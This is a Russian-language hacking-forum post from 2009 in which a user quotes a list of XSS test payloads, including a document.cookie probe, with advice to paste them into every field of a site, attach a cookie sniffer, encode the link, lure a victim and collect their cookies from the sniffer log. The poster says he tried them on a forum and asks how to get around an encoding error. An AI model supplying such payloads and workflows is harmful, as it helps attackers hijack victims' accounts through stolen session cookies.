
12.12.2009, 12:08
|
|
Новичок
Регистрация: 21.11.2009
Сообщений: 11
Провел на форуме: 58706
Репутация:
1
|
|
Сообщение от root_sashok
Логинься и подставляй во все поля всевозможные комбинации:
Код:
<img src="javascript:alert('XSS')"</img>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.
Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.
Последний раз редактировалось sakrej1; 12.12.2009 в 12:51..
|
|
|